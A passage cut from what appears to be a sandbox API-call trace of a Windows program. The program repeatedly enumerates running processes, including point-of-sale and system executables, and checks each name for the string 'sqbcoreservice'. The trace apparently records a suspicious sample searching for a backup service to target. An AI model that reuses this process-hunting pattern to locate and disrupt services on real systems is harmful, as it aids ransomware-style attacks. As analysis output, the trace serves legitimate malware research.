th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.280] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575ce0 [0096.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575ce0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0096.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0096.280] StrStrIA (lpFirst="creditservice.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.280] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.281] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577180 [0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3577180, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0096.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0096.282] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.283] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577048 [0096.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3577048, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0096.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0096.283] StrStrIA (lpFirst="fpos.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.283] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.290] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577078 [0096.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3577078, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0096.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0096.290] StrStrIA (lpFirst="isspos.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.292] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575ca0 [0096.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575ca0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0096.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0096.292] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.292] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.293] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577270 [0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3577270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0096.293] StrStrIA (lpFirst="omnipos.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.293] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.295] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577120 [0096.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3577120, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.295] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0096.295] StrStrIA (lpFirst="spcwin.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.295] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.296] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3575d60 [0096.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575d60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0096.296] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0096.296] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.296] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.297] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35770a8 [0096.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35770a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0096.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0096.298] StrStrIA (lpFirst="utg2.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.298] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0096.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.299] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577108 [0096.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3577108, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0096.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0096.299] StrStrIA (lpFirst="saying.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.299] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0096.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.300] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577018 [0096.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3577018, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0096.301] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0096.301] StrStrIA (lpFirst="ripe.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.301] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0096.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.302] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577228 [0096.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3577228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0096.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0096.302] StrStrIA (lpFirst="acoustic.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.302] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0096.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.303] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577030 [0096.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3577030, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0096.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0096.303] StrStrIA (lpFirst="mail.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.303] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.304] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35770f0 [0096.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35770f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.304] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.304] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.304] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.305] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577138 [0096.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.305] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.305] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.305] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.306] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577198 [0096.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577198, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0096.306] StrStrIA (lpFirst="dllhost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.306] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.307] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577168 [0096.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3577168, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.307] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.307] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0096.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.308] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35771b0 [0096.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35771b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0096.308] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0096.308] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.308] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.309] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577060 [0096.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3577060, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.310] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.310] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0096.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.310] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3575d80 [0096.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3575d80, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0096.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0096.311] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.311] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0096.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.312] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575dc0 [0096.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3575dc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0096.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0096.312] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.312] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0096.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.313] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356af60 [0096.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356af60, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0096.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0096.313] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.313] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.314] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35771f8 [0096.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35771f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") 